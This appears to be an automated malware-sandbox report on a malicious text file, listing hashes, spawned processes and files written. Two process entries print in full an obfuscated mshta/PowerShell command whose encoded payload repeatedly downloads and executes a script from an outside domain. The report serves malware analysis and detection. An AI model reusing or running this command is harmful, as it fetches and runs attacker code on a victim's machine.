File name: | New Text Document.txt |
Full analysis: | https://app.any.run/tasks/e6095610-c47c-4d37-9a48-15f545ddfdf8 |
Verdict: | Malicious activity |
Analysis date: | June 27, 2022, 06:28:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | 29EA3BBF34F3D4D2BD73BBB962ED6E63 |
SHA1: | 015A583092A2FFB7A9893D35F27EE2F7728FA6EE |
SHA256: | 2B616ABC0EC6BC1DA8EBAD1633FFCFE1BA6F057F288A6937784746A3F8083A57 |
SSDEEP: | 12:oXKNtPNKe2Mf6kasqdnptPEn+iVtRGSBkiJfe2x9KQGWVq1SkuHD2:oXyP1f6kahJp5E7fnJe2yOVqUka2 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2504 | "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\AppData\Local\Temp\New Text Document.txt" | C:\Windows\system32\NOTEPAD.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3840 | "C:\Windows\SysWOW64\mshta.exe" mshta vbscript:createobject(wscript.shell).run(PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADgAegBrAC4AZgB1AG4ALwBpAC4AcABo | C:\Windows\SysWOW64\mshta.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3936 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 3221225786 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2732 | C:\Windows\SysWOW64\mshta.exe mshta vbscript:createobject(wscript.shell).run(PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADgAegBrAC4AZgB1AG4ALwBpAC4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACgAIgAkAGEAIgArACcAMwAnACkAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzADAADQAKAH0ADQAKAA==,0)(window.close) | C:\Windows\SysWOW64\mshta.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3868 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 3221225786 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
3944 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Explorer.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:AC0CC66E77CEF4BC87840F85F745CCB0 | SHA256:D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557 | |||
3868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF110378.TMP | binary | |
MD5:CCFCF369F751CE8DA0370D84E52A7EED | SHA256:53922490C3F5A04667EC3605A01AF2A4F4F265782D1BCA519F63ACAD413F2ED9 | |||
3868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QW22GAMEK0NA1OVX80Z5.temp | binary | |
MD5:AC0CC66E77CEF4BC87840F85F745CCB0 | SHA256:D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557 | |||
3944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C05TMQIUQA3XOBEL8LRQ.temp | binary | |
MD5:D48DC8803C9B6EACA9E0BD2087029C89 | SHA256:ED0445D07F7CFA29B7B93211AE4E05594BA7338CC821AA348DA1BE0DC66FDC19 | |||
3944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D48DC8803C9B6EACA9E0BD2087029C89 | SHA256:ED0445D07F7CFA29B7B93211AE4E05594BA7338CC821AA348DA1BE0DC66FDC19 | |||
3944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11756b.TMP | binary | |
MD5:AC0CC66E77CEF4BC87840F85F745CCB0 | SHA256:D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557 | |||
3944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jlkhqtgc.q2x.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3868 | powershell.exe | C:\Users\admin\AppData\Local\Temp\omi5kl10.gym.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3868 | powershell.exe | C:\Users\admin\AppData\Local\Temp\y3oppvvs.5ep.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3868 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |